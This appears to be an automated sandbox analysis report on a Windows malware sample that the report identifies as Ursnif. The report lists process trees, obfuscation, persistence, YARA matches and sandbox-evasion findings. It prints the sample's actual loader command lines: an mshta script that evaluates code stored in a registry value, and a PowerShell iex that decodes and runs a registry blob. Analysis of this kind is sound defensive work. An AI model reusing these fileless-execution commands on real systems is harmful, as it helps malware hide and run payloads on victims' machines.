Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\v0ewugxm\v0ewugxm.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES556B.tmp' 'c:\Users\user\AppData\Local\Temp\v0ewugxm\CSC796D60C17DC54E309D26CA9CC0469D24.TMP'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\0oy3xkhb\0oy3xkhb.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES6171.tmp' 'c:\Users\user\AppData\Local\Temp\0oy3xkhb\CSC12D6740B38D4874A9168A78B923F8E.TMP'
Source: unknown Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:464 CREDAT:17410 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5508 CREDAT:17410 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5508 CREDAT:17422 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5508 CREDAT:82962 /prefetch:2 Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\v0ewugxm\v0ewugxm.cmdline' Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\0oy3xkhb\0oy3xkhb.cmdline' Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES556B.tmp' 'c:\Users\user\AppData\Local\Temp\v0ewugxm\CSC796D60C17DC54E309D26CA9CC0469D24.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES6171.tmp' 'c:\Users\user\AppData\Local\Temp\0oy3xkhb\CSC12D6740B38D4874A9168A78B923F8E.TMP'
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\System32\control.exe Process created: unknown unknown
Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: u.dll Static file information: File size 1154904 > 1048576
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll Jump to behavior
Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000001D.00000002.403057953.0000022AC2C50000.00000002.00000001.sdmp, csc.exe, 00000020.00000002.409373229.00000285A6DD0000.00000002.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000023.00000000.429222350.0000000006300000.00000002.00000001.sdmp
Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.427507513.0000000003F50000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.427507513.0000000003F50000.00000004.00000001.sdmp
Source: Binary string: rundll32.pdb source: control.exe, 00000026.00000002.443790025.0000016755F5C000.00000004.00000040.sdmp
Source: Binary string: rundll32.pdbGCTL source: control.exe, 00000026.00000002.443790025.0000016755F5C000.00000004.00000040.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000023.00000000.429222350.0000000006300000.00000002.00000001.sdmp

Data Obfuscation:

barindex
Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) Jump to behavior
Compiles C# or VB.Net code
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\v0ewugxm\v0ewugxm.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\0oy3xkhb\0oy3xkhb.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\v0ewugxm\v0ewugxm.cmdline' Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\0oy3xkhb\0oy3xkhb.cmdline' Jump to behavior
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00765BD5 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00765BD5
PE file contains an invalid checksum
Source: 0oy3xkhb.dll.32.dr Static PE information: real checksum: 0x0 should be: 0xea29
Source: u.dll Static PE information: real checksum: 0x120401 should be: 0x120400
Source: v0ewugxm.dll.29.dr Static PE information: real checksum: 0x0 should be: 0x6ad8
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10002193 push ecx; ret 0_2_100021A3
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10002140 push ecx; ret 0_2_10002149
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00787177 push ecx; ret 0_2_00787187
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00786E10 push ecx; ret 0_2_00786E19
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_007EBAD0 push edx; ret 0_2_007EBBD4
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_007E544B pushfd ; iretd 0_2_007E544D
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_007E3412 push es; iretd 0_2_007E3413
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_007E197F push ds; retf 0_2_007E198D
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_007E3205 push cs; retf 0_2_007E3206
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_007E16B6 push ecx; ret 0_2_007E16B7
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_007E3F3F pushfd ; ret 0_2_007E3F46
Source: C:\Windows\System32\control.exe Code function: 38_2_00E4C131 push 3B000001h; retf 38_2_00E4C136

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\v0ewugxm\v0ewugxm.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\0oy3xkhb\0oy3xkhb.dll Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000023.00000003.439971229.00000000032B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.264849176.00000000032C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.430559712.0000016753ED0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.265016574.00000000032C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.441197117.0000000000760000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.424976017.00000000007A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.264996879.00000000032C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.442622073.0000000000E5E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.264981928.00000000032C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.264937630.00000000032C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.264962927.00000000032C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.415711591.000001FE6ECE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.365389043.000000000314B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.264883411.00000000032C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.265008203.00000000032C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6872, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 5308, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 5388, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3388, type: MEMORY
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\loaddll32.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Contains capabilities to detect virtual machines
Source: C:\Windows\System32\control.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2913 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6001 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\v0ewugxm\v0ewugxm.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\0oy3xkhb\0oy3xkhb.dll Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5320 Thread sleep time: -9223372036854770s >= -30000s Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0076E0BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 0_2_0076E0BA
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0077888D lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 0_2_0077888D
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00784FE1 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 0_2_00784FE1
